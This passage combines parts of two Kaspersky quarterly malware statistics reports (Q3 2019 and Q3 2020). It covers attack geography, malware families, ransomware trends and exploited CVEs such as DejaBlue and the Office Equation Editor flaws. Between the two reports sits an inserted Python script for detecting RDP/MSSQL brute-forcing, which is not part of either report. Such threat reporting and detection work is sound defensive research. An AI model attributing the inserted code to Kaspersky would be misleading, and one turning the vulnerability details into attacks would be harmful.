This malware in turn downloaded adware programs of the Pirrit family, as a result of which its members took the second to fifth positions in our ranking.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 6.95 \n2 | India | 6.24 \n3 | Spain | 5.61 \n4 | Italy | 5.29 \n5 | US | 4.84 \n6 | Russia | 4.79 \n7 | Brazil | 4.75 \n8 | Mexico | 4.68 \n9 | Canada | 4.46 \n10 | Australia | 4.27 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nThe geographical distribution of attacked users underwent some minor changes: India took silver with 6.24% of attacked users, while Spain came in third with 5.61%. France (6.95%) hung on to first position.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3, the trend continued toward a decrease in the number of IP addresses of devices used to carry out attacks on Kaspersky Telnet honeypots. Whereas in Q2 Telnet's share was still significantly higher than that of SSH, in Q3 the figures were almost equal. \n \nSSH | 48.17% \n---|--- \nTelnet | 51.83% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2019_\n\nAs for the number of sessions involving Kaspersky [traps](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we noted that in Q3 Telnet-based control was also deployed more often. 
\n \nSSH | 40.81% \n---|--- \nTelnet | 59.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171344/malware-q3-2019-statistics-en-10.png>)\n\n**TOP 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky traps**\n\n| Country | %* \n---|---|--- \n1 | China | 13.78 \n2 | Egypt | 10.89 \n3 | Brazil | 8.56 \n4 | Taiwan | 8.33 \n5 | US | 4.71 \n6 | Russia | 4.35 \n7 | Turkey | 3.47 \n8 | Vietnam | 3.44 \n9 | Greece | 3.43 \n10 | India | 3.41 \n \nLast quarter's leaders Egypt (10.89%), China (13.78%), and Brazil (8.56%) again made up the TOP 3, the only difference being that this time China took first place.\n\nTelnet-based attacks most often resulted in the download of a member of the notorious Mirai family.\n\n**TOP 10 malware downloaded to infected IoT devices via successful telnet-based attacks**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.08 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.46 \n3 | Backdoor.Linux.Mirai.ba | 16.52 \n4 | Backdoor.Linux.Gafgyt.bj | 2.76 \n5 | Backdoor.Linux.Mirai.au | 2.21 \n6 | Backdoor.Linux.Mirai.c | 2.02 \n7 | Backdoor.Linux.Mirai.h | 1.81 \n8 | Backdoor.Linux.Mirai.ad | 1.66 \n9 | Backdoor.Linux.Gafgyt.az | 0.86 \n10 | Backdoor.Linux.Mirai.a | 0.80 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful Telnet-based attack._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171352/malware-q3-2019-statistics-en-11.png>)\n\n**TOP 10 countries by location of devices from which attacks were 
made on Kaspersky SSH traps**\n\n| Country | %* \n---|---|--- \n1 | Egypt | 17.06 \n2 | Vietnam | 16.98 \n3 | China | 13.81 \n4 | Brazil | 7.37 \n5 | Russia | 6.71 \n6 | Thailand | 4.53 \n7 | US | 4.13 \n8 | Azerbaijan | 3.99 \n9 | India | 2.55 \n10 | France | 1.53 \n \nIn Q3 2019, the largest number of attacks on Kaspersky traps using the SSH protocol came from Egypt (17.06%). Vietnam (16.98%) and China (13.81%) took second and third places, respectively.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 197,559 users.\n\n_Number of unique users attacked by financial malware, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171358/malware-q3-2019-statistics-en-12.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171406/malware-q3-2019-statistics-en-13.png>)\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.9 \n2 | Uzbekistan | 2.1 \n3 | South Korea | 1.9 \n4 | Venezuela | 1.8 \n5 | Tajikistan | 1.4 \n6 | Afghanistan | 1.3 \n7 | China | 1.2 \n8 | Syria | 1.2 \n9 | Yemen | 1.2 \n10 | Sudan | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- 
\n1 | Zbot | Trojan.Win32.Zbot | 26.7 \n2 | Emotet | Backdoor.Win32.Emotet | 23.9 \n3 | RTM | Trojan-Banker.Win32.RTM | 19.3 \n4 | Nimnul | Virus.Win32.Nimnul | 6.6 \n5 | Trickster | Trojan.Win32.Trickster | 5.8 \n6 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.4 \n7 | Nymaim | Trojan.Win32.Nymaim | 3.6 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.4 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 3.3 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.8 \n \n_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nThe TOP 3 in Q3 2019 had the same faces as last quarter, only in a different order: the RTM family (19.3%) dropped from first to third, shedding almost 13 p.p., allowing the other two \u2014 Zbot (26.7%) and Emotet (23.9%) \u2014 to climb up. Last quarter we noted a decline in the activity of Emotet servers, but in Q3 it came back on track, with Emotet's share growing by more than 15 p.p.\n\nFourth and fifth places did not change at all \u2014 still occupied by Nimnul (6.6%) and Trickster (5.8%). Their scores rose insignificantly, less than 1 p.p. Of the new entries in our TOP 10, worth noting is the banker CliptoShuffler (5.4%), which stormed straight into sixth place.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe number of ransomware attacks against [government](<https://threatpost.com/ransomware-demand-massachusetts-city-no-thanks/148034/>) [agencies](<https://threatpost.com/coordinated-ransomware-attack-hits-23-texas-government-agencies/147457/>), as well as organizations in the healthcare, [education](<https://www.bleepingcomputer.com/news/security/monroe-college-hit-with-ransomware-2-million-demanded/>), and [energy](<https://www.bleepingcomputer.com/news/security/ransomware-attack-cripples-power-company-s-entire-network/>) sectors, continues to rise. 
We [noted](<https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/#glavnye-sobytiya-kvartala>) this trend back in the previous quarter.\n\nA [new type of attack](<https://threatpost.com/linux-ransomware-nas-servers/146441/>), one on network-attached storage (NAS) devices, is gaining ground. The infection scheme involves attackers scanning IP address ranges in search of NAS devices accessible via the Internet. Generally, only the web interface is accessible from the outside, protected by an authentication page; however, a number of devices have vulnerabilities in the firmware. This enables cybercriminals, by means of an exploit, to install on the device a Trojan that encrypts all data on NAS-connected media. This is a particularly dangerous attack: in many cases the NAS is used to store backups, such devices are generally perceived by their owners as a reliable means of storage, and the mere possibility of an infection can come as a shock.\n\n[Wipers](<https://encyclopedia.kaspersky.com/glossary/wiper/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) have also become a [more frequent attack tool](<https://www.bleepingcomputer.com/news/security/destructive-ordinypt-malware-hitting-germany-in-new-spam-campaign/>). Like ransomware, such programs rename files and make ransom demands. But these Trojans irreversibly ruin the file contents (replacing them with zeros or random bytes), so even if the victim pays up, the original files are lost.\n\nThe FBI published decryption keys for GandCrab (verdict Trojan-Ransom.Win32.GandCrypt) versions 4 and 5. 
The decryption was added to the latest [RakhniDecryptor](<https://support.kaspersky.com/10556>) build.

### Number of new modifications

In Q3 2019, we identified three new families of ransomware Trojans and discovered 13,138 new modifications of this malware.

_Number of new ransomware modifications, Q3 2018 – Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171414/malware-q3-2019-statistics-en-14.png>)

### Number of users attacked by ransomware Trojans

In Q3 2019, Kaspersky products defeated ransomware attacks against 229,643 unique KSN users. This is slightly fewer than in the previous quarter.

_Number of unique users attacked by ransomware Trojans, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171421/malware-q3-2019-statistics-en-15.png>)

July saw the largest number of attacked users — 100,380, almost 20,000 more than in June. After that, however, this indicator fell sharply and did not stray far from the figure of 90,000 attacked users.

### Attack geography

_Geographical spread of countries by share of users attacked by ransomware Trojans, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171430/malware-q3-2019-statistics-en-16.png>)

**TOP 10 countries attacked by ransomware Trojans**

|    | **Country*** | **% of users attacked by cryptors**** |
|---|---|---|
| 1 | Bangladesh | 6.39 |
| 2 | Mozambique | 2.96 |
| 3 | Uzbekistan | 2.26 |
| 4 | Nepal | 1.71 |
| 5 | Ethiopia | 1.29 |
| 6 | Ghana | 1.19 |
| 7 | Afghanistan | 1.12 |
| 8 | Egypt | 0.83 |
| 9 | Palestine | 0.80 |
| 10 | Vietnam | 0.79 |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._

### TOP 10 most common families of ransomware Trojans

|    | **Name** | **Verdicts** | **% of attacked users*** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.96 |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 20.01 |
| 3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 8.58 |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 8.36 |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.56 |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 5.08 |
| 7 | Stop | Trojan-Ransom.Win32.Stop | 4.63 |
| 8 | Rakhni | Trojan-Ransom.Win32.Rakhni | 3.97 |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 2.77 |
| 10 | PolyRansom/VirLock | Virus.Win32.PolyRansom, Trojan-Ransom.Win32.PolyRansom | 2.50 |

_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._

## Miners

### Number of new modifications

In Q3 2019, Kaspersky solutions detected 11,753 new modifications of miners.

_Number of new miner modifications, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171437/malware-q3-2019-statistics-en-17.png>)

### Number of users attacked by miners

In Q3, we detected attacks using miners on the computers of 639,496 unique users of Kaspersky products worldwide.

_Number of unique users attacked by miners, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171445/malware-q3-2019-statistics-en-18.png>)

The number of attacked users continued to decline in Q3, down to 282,334 in August.
In September, this indicator began to grow — up to 297,394 — within touching distance of July's figure.

### Attack geography

_Geographical spread of countries by share of users attacked by miners, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171455/malware-q3-2019-statistics-en-19.png>)

**TOP 10 countries by share of users attacked by miners**

|    | **Country*** | **% of users attacked by miners**** |
|---|---|---|
| 1 | Afghanistan | 9.42 |
| 2 | Ethiopia | 7.29 |
| 3 | Uzbekistan | 4.99 |
| 4 | Sri Lanka | 4.62 |
| 5 | Tanzania | 4.35 |
| 6 | Vietnam | 3.72 |
| 7 | Kazakhstan | 3.66 |
| 8 | Mozambique | 3.44 |
| 9 | Rwanda | 2.55 |
| 10 | Bolivia | 2.43 |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyber attacks

As before, in the statistics on the distribution of exploits used by cybercriminals, the largest share (73%) belongs to vulnerabilities in the Microsoft Office suite. Most common of all, as in the previous quarter, were stack overflow errors ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)) in the Equation Editor application, which was previously part of Microsoft Office.
Other Microsoft Office vulnerabilities widely exploited this quarter were again [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), and [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>).

Modern browsers are complex software products, which means that new vulnerabilities are constantly being discovered and used in attacks (13%). The most common target for cybercriminals is Microsoft Internet Explorer, whose vulnerabilities are often exploited in the wild. This quarter saw the discovery of the actively exploited zero-day vulnerability [CVE-2019-1367](<https://www.helpnetsecurity.com/2019/09/24/cve-2019-1367/>), which causes memory corruption and allows remote code execution on the target system. The fact that Microsoft released an unscheduled patch for it points to how serious the situation was. Nor was Google Chrome problem-free this quarter, having received updates to fix a number of [critical vulnerabilities](<https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code-execution_2019-095/>) (CVE-2019-13685, CVE-2019-13686, CVE-2019-13687, CVE-2019-13688), some of which allow intruders to circumvent all levels of browser protection and execute code in the system, bypassing the [sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).

The majority of vulnerabilities aimed at privilege escalation inside the system stem from individual operating system services and popular apps. Privilege escalation vulnerabilities play a special role, as they are often used by malicious software to gain persistence in the target system.
Of note this quarter are the vulnerabilities [CVE-2019-14743](<https://www.bleepingcomputer.com/news/security/steam-security-saga-continues-with-vulnerability-fix-bypass/>) and [CVE-2019-15315](<https://nvd.nist.gov/vuln/detail/CVE-2019-15315>), which allow systems with the popular Steam client installed to be compromised. A flaw in the Microsoft Windows Text Services Framework also warrants a mention. A Google researcher published a tool to demonstrate the problem ([CtfTool](<https://blog.stealthbits.com/using-ctftool-exe-to-escalate-privileges-by-leveraging-text-services-framework-and-mitigation-processes-and-steps/>)), which allows processes to be run with system privileges, as well as changes to be made to the memory of other processes and arbitrary code to be executed in them.

_Distribution of exploits used in attacks by type of application attacked, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171502/malware-q3-2019-statistics-en-20.png>)

Network attacks are still widespread. This quarter, as in previous ones, we registered numerous attempts to exploit vulnerabilities in the SMB protocol. This indicates that unprotected and unpatched systems are still at high risk of infection in attacks that deploy EternalBlue, EternalRomance, and other exploits. That said, a large share of malicious network traffic is made up of requests aimed at brute-forcing passwords in popular network services and servers, such as Remote Desktop Protocol and Microsoft SQL Server.
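Detection logic for the brute-force traffic just described, added here as an example rather than anything from the report: it counts authentication failures per source and service over a sliding window and flags a source once it crosses a threshold, using a simplified, constructed line format for RDP (Windows event 4625) and Microsoft SQL Server (error 18456) failures. The format, function names and sample log are this example's own assumptions.

```python
"""Added example: flag password brute-forcing against RDP and Microsoft SQL
Server from authentication-failure log lines.

Assumed, constructed line format (not the format of any real product):
  <ISO time> RDP 4625 user=<name> src=<ip>      Windows failed logon (event 4625)
  <ISO time> MSSQL 18456 user=<name> src=<ip>   SQL Server login failed (18456)
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) "
    r"(?P<service>RDP|MSSQL) (?P<event>4625|18456) "
    r"user=(?P<user>\S+) src=(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)


def parse_line(line):
    """Return (timestamp, service, source_ip, user), or None for any line that
    is not an authentication failure in the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["service"], m["ip"], m["user"]


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of failures per (source_ip, service).

    One alert per key, raised the first time `threshold` failures fall inside
    `window`. distinct_users > 1 inside the window points to password spraying
    (many accounts, few guesses each) rather than a single-account attack."""
    events = sorted(filter(None, (parse_line(line) for line in lines)))
    recent = defaultdict(deque)  # (ip, service) -> deque of (ts, user) in window
    alerts = {}
    for ts, service, ip, user in events:
        key = (ip, service)
        q = recent[key]
        q.append((ts, user))
        while ts - q[0][0] > window:  # expire failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = {
                "first_seen": q[0][0],
                "failures_in_window": len(q),
                "distinct_users": len({u for _, u in q}),
            }
    return alerts


# Constructed sample log: one RDP password spray from 203.0.113.7 and a few
# scattered MSSQL failures from 198.51.100.9 that stay below the threshold.
SAMPLE_LOG = [
    "2019-09-14T10:00:01Z RDP 4625 user=Administrator src=203.0.113.7",
    "2019-09-14T10:00:04Z RDP 4625 user=admin src=203.0.113.7",
    "2019-09-14T10:00:07Z RDP 4625 user=backup src=203.0.113.7",
    "2019-09-14T10:00:09Z MSSQL 18456 user=sa src=198.51.100.9",
    "2019-09-14T10:00:11Z RDP 4625 user=sqlsvc src=203.0.113.7",
    "2019-09-14T10:00:15Z RDP 4625 user=guest src=203.0.113.7",
    "2019-09-14T10:00:19Z RDP 4625 user=test src=203.0.113.7",
    "2019-09-14T10:05:00Z MSSQL 18456 user=sa src=198.51.100.9",
    "2019-09-14T10:09:30Z MSSQL 18456 user=sa src=198.51.100.9",
    "this line is not an authentication failure and is ignored",
]

if __name__ == "__main__":
    for key, info in detect_bruteforce(SAMPLE_LOG).items():
        print(key, info)
```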
RDP also faced other problems, related to the discovery of several vulnerabilities in this network protocol united under the common name [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) ([CVE-2019-1181](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1181>), [CVE-2019-1182](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1182>), [CVE-2019-1222](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1222>), [CVE-2019-1223](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1223>), [CVE-2019-1224](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1224>), [CVE-2019-1225](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1225>), [CVE-2019-1226](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1226>)). Unlike the previously discovered [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), these vulnerabilities affect not only old versions of operating systems, but new ones as well, such as Windows 10. As in the case of [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>), some [DejaBlue](<https://www.wired.com/story/dejablue-windows-bugs-worm-rdp/>) vulnerabilities do not require authorization on the attacked system and allow malicious activity to be carried out without the user noticing. Therefore, it is vital to promptly install the latest updates for both the operating system and antivirus solutions to reduce the risk of infection.

### Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages.
Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: TOP 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q3 2019, Kaspersky solutions blocked **989,432,403** attacks launched from online resources located in 203 countries across the globe. **560,025,316** unique URLs triggered Web Anti-Virus components.

_Distribution of web-based attack sources by country, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171508/malware-q3-2019-statistics-en-21.png>)

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter.
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

|    | Country* | % of attacked users** |
|---|---|---|
| 1 | Tunisia | 23.26 |
| 2 | Algeria | 19.75 |
| 3 | Albania | 18.77 |
| 4 | Réunion | 16.46 |
| 5 | Bangladesh | 16.46 |
| 6 | Venezuela | 16.21 |
| 7 | North Macedonia | 15.33 |
| 8 | France | 15.09 |
| 9 | Qatar | 14.97 |
| 10 | Martinique | 14.84 |
| 11 | Greece | 14.59 |
| 12 | Serbia | 14.36 |
| 13 | Syria | 13.99 |
| 14 | Bulgaria | 13.88 |
| 15 | Philippines | 13.71 |
| 16 | UAE | 13.64 |
| 17 | Djibouti | 13.47 |
| 18 | Morocco | 13.35 |
| 19 | Belarus | 13.34 |
| 20 | Saudi Arabia | 13.30 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._

_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 10.97% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of malicious web-based attacks, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171517/malware-q3-2019-statistics-en-22.png>)

## Local threats

_Statistics on local infections of user computers are an important indicator.
They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._

In Q3 2019, our File Anti-Virus detected **230,051,054** malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

|    | Country* | % of attacked users** |
|---|---|---|
| 1 | Afghanistan | 53.45 |
| 2 | Tajikistan | 48.43 |
| 3 | Yemen | 48.39 |
| 4 | Uzbekistan | 48.38 |
| 5 | Turkmenistan | 45.95 |
| 6 | Myanmar | 45.27 |
| 7 | Ethiopia | 44.18 |
| 8 | Laos | 43.24 |
| 9 | Bangladesh | 42.96 |
| 10 | Mozambique | 41.58 |
| 11 | Syria | 41.15 |
| 12 | Vietnam | 41.11 |
| 13 | Iraq | 41.09 |
| 14 | Sudan | 40.18 |
| 15 | Kyrgyzstan | 40.06 |
| 16 | China | 39.94 |
| 17 | Rwanda | 39.49 |
| 18 | Venezuela | 39.18 |
| 19 | Malawi | 38.81 |
| 20 | Nepal | 38.38 |

_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data.
The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones and external hard drives._

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q3 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/28171525/malware-q3-2019-statistics-en-23.png>)

Overall, 21.1% of user computers globally faced at least one **Malware-class** local threat during Q3.

The figure for Russia was 24.24%.

_Source: "IT threat evolution Q3 2019. Statistics", Securelist, published 2019-11-29, https://securelist.com/it-threat-evolution-q3-2019-statistics/95269/_

# IT threat evolution Q3 2020. Statistics

_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network, in Q3:

 * Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.
 * 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempts 
to run malware for stealing money from online bank accounts were stopped on the computers of 146,761 unique users.
 * Ransomware attacks were defeated on the computers of 121,579 unique users.
 * Our File Anti-Virus detected 87,941,334 unique malicious and potentially unwanted objects.

## Financial threats

### Financial threat statistics

In Q3 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 146,761 users.

_Number of unique users attacked by financial malware, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18161937/malware-report-q3-2020_01-en.png>))_

### Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country.

_Geography of financial malware attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162003/malware-report-q3-2020_02-en.png>))_

**Top 10 countries by share of attacked users**

|    | **Country*** | **%**** |
|---|---|---|
| 1 | Costa Rica | 6.6 |
| 2 | Turkmenistan | 5.9 |
| 3 | Tajikistan | 4.7 |
| 4 | Uzbekistan | 4.6 |
| 5 | Afghanistan | 3.4 |
| 6 | Syria | 1.7 |
| 7 | Iran | 1.6 |
| 8 | Yemen | 1.6 |
| 9 | Kazakhstan | 1.5 |
| 10 | Venezuela | 1.5 |

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._
_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._

First among the banker families, as in the previous quarter, is Zbot (19.7%), despite its share dropping 5.1 p.p. It is followed by Emotet (16.1%) — as we predicted, this malware renewed its activity, climbing by 9.5 p.p.
as a result. Meanwhile, the share of another banker family, RTM, decreased by 11.2 p.p., falling from second position to fifth with a score of 7.4%.

**Top 10 banking malware families**

|    | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 19.7 |
| 2 | Emotet | Backdoor.Win32.Emotet | 16.1 |
| 3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 12.2 |
| 4 | Trickster | Trojan.Win32.Trickster | 8.8 |
| 5 | RTM | Trojan-Banker.Win32.RTM | 7.4 |
| 6 | Neurevt | Trojan.Win32.Neurevt | 5.4 |
| 7 | Nimnul | Virus.Win32.Nimnul | 4.4 |
| 8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.5 |
| 9 | Danabot | Trojan-Banker.Win32.Danabot | 3.1 |
| 10 | Gozi | Trojan-Banker.Win32.Gozi | 1.9 |

_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._

## Ransomware programs

### Quarterly trends and highlights

Q3 2020 saw many high-profile ransomware attacks on organizations in various fields: [education](<https://threatpost.com/university-of-utah-pays-457k-after-ransomware-attack/158564/>), [healthcare](<https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/>), [governance](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-hits-argentinian-government-demands-4-million/>), [energy](<https://www.bleepingcomputer.com/news/security/edp-energy-giant-confirms-ragnar-locker-ransomware-attack/>), [finance](<https://www.bleepingcomputer.com/news/security/development-bank-of-seychelles-hit-by-ransomware-attack/>), [IT](<https://www.bleepingcomputer.com/news/security/equinix-data-center-giant-hit-by-netwalker-ransomware-45m-ransom/>), [telecommunications](<https://www.bleepingcomputer.com/news/security/orange-confirms-ransomware-attack-exposing-business-customers-data/>) and [many](<https://www.kaspersky.com/blog/wastedlocker-garmin-incident/36626/>)
[others](<https://www.bleepingcomputer.com/news/security/ray-ban-owner-luxottica-confirms-ransomware-attack-work-disrupted/>). Such cybercriminal activity is understandable: a successful attack on a major organization can command a ransom in the millions of dollars, which is several orders of magnitude higher than the typical sum for mass ransomware.

Campaigns of this type can be viewed as advanced persistent threats (APTs), and Kaspersky researchers [detected the involvement](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) of the Lazarus group in the distribution of one of these ransomware programs.

Distributors of these Trojans also began to cooperate with the aim of carrying out more effective and destructive attacks. At the start of the quarter, word leaked out that Maze operators had joined forces with distributors of LockBit, and later RagnarLocker, to form a ransomware cartel. The cybercriminals used shared infrastructure to publish stolen confidential data. Also observed was the [pooling of expertise](<https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/>) in countering security solutions.

Of the more heartening events, Q3 will be remembered for the arrest of one of the operators of the GandCrab ransomware.
Law enforcement agencies in Belarus, Romania and the UK [teamed up to catch](<https://www.zdnet.com/article/gandcrab-ransomware-distributor-arrested-in-belarus/>) the distributor of the malware, which had reportedly infected more than 1,000 computers.

### Number of new modifications

In Q3 2020, we detected four new ransomware families and 6,720 new modifications of this malware type.

_Number of new ransomware modifications, Q3 2019 – Q3 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2020/11/18185739/malware-report-q3-2020_03.png>))_

### Number of users attacked by ransomware Trojans

